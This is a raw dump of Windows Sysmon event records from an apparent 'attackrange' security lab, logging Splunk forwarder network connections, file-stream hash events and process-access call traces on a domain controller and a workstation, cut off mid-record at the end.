354300x800000000000000082009Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:04.662{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50068-false10.0.1.12-8000- 23542300x8000000000000000104148Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:07.748{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EFFC8AEEF7B34DDB5974E9AFC8EB435,SHA256=C33DB2D99A9E884C3FB0F4B43605619AA7A264CD1256FC47C582E08EFDC34079,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082011Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:07.547{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67E36401A24699C1F5174D8D4E23F9ED,SHA256=7ACB25A6E8E592732FBC31A1CD15150B7BE1532E5B978CDAB643E4A12CD7D290,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104153Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:08.858{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104152Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:08.858{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104151Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:08.858{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104150Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:08.748{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB4D01469970BDB6BC5514FE574D4C49,SHA256=DB091BE479CF641C6B4B347CCEF1B072EBAEC702A179C32BAE4AD2526D7FC39D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082012Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:08.547{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C6648C4D3AD5E57F3B2EDBF0779BD68,SHA256=D6BE58234E887F3EC49C1AB16D6BED265CF50053A04D2325C610D2C9D689E779,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104149Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:07.315{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49579-false10.0.1.12-8000- 23542300x8000000000000000104154Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:09.764{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=773BFAD151840A7249674FD55941F24B,SHA256=23A13D589C744B8D4C7EA23B3591C275BE975B7B8B04142A9CC4784FFB2EBCA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082013Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:09.547{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B120E40595D99EABA3A456FBA480934,SHA256=3D53462B65196CDCA5B2D797F72B9269A92FD1CDA9D8BBC85E7AB558B9942896,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104155Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:10.764{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CEE21138A9A68488804BD17CD51F177,SHA256=053B5CFD7CEDF5DA001FED55011AA18F5CC22AB31C93B30D3F1560F54CCCA67B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082014Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:10.547{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C79EB4B373C17D14D0FB69C88BB68FC,SHA256=4E80697EE58B6E36B4E3A0E5A29150B853DA9819CFDE712DC42D2705C3FEE006,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104157Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:11.780{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=415DFFA79CE26C5E29CA0B17CF55C392,SHA256=B31B93A30A14D957C332E0F7BBC86FFB28B98DC2FDBB36BDBC08463ED2D2D380,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082016Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:09.677{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50069-false10.0.1.12-8000- 23542300x800000000000000082015Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:11.547{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F740B7C89577A95E514C497D70255B3F,SHA256=C16F455BC7A7C146D6B79143000337EE324C8580A9024267CE580648EB67AACF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104156Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:11.623{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\new 2@2021-10-04_075343MD5=36D7B1370A07801BB48A646CDC818C63,SHA256=50E166C73B1A5A976B8A2D6965486AB84D5A24A8FA74529FE722A0D6B5EB406B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104160Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:12.795{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB1064D2D8C0EFC019DDBFCF610B407B,SHA256=5A9A8DC860B1813B0FCAD492EE5664B3BD2C1525011D1B504F52C1A14BFFEBB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082017Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:12.547{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C51B1C4F3301981A02B3A34956772C9E,SHA256=7F38B02CA9B019D76D83E905807285A3F985D3FA848E1E3C16D04A282FA2DFA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104159Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:12.373{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B00589E601F2F9B0C5AD15879A13C74A,SHA256=C81BCA0C558BD612B4D6DE5BF379228219521902102B7EF6EC66776437F6935D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104158Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:12.373{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67C72CDA010B3A7C7AB3E22E257F5596,SHA256=96444438A41135A5611D4471AE9A3F977094D1EBF7AF6E5BDF16CD908F9E8C2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104164Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:13.795{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=013AFB80AEBBBFCE2961A49C68CB8FB8,SHA256=EF7E587182F7D0A3D8DEA6DDE8E006E3A229CCF47C503374D08D3C842EB259F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082018Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:13.547{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5372435873CA419309650827E68E8209,SHA256=C8401C866CB8346D16D85461792A5607E52477EE5179820CB85DED9FAD38A0D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104163Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:13.045{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104162Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:13.045{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104161Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:13.045{58E9C193-AE68-615A-C800-00000000FC01}45481412C:\Windows\Explorer.EXE{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082019Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:14.547{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A230022CFADF25FAC71B1E890F34DBF2,SHA256=70B8A114700ED9F1F2983B7A6ADA527243B08BEE974287E623BFD0E676440337,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104166Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:14.826{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D2EB1FDB98728F378F190F3CC321026,SHA256=60608F40E808C3A3A2F10AA32F438C0EA14309ED50103983667D8B0B0FF339FD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104165Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:13.300{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49580-false10.0.1.12-8000- 23542300x8000000000000000104196Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.842{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6E0E262CD51F8B26B7F6166158312F9,SHA256=57FD488D8AB134AA94C1641726104B062E1CD1D5F01002284387609EAB09A773,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082020Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:15.562{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0629D5D435324C695B7090BC0E57BEE8,SHA256=FC1EBC4BE0F71117C4C20973F55FB59E5FB8A5135FCB747A58FF335CEE79394B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104195Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104194Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104193Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104192Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104191Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104190Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104189Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104188Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104187Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2C00-00000000FC01}2292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104186Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:15.217{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2C00-00000000FC01}2292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104185Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 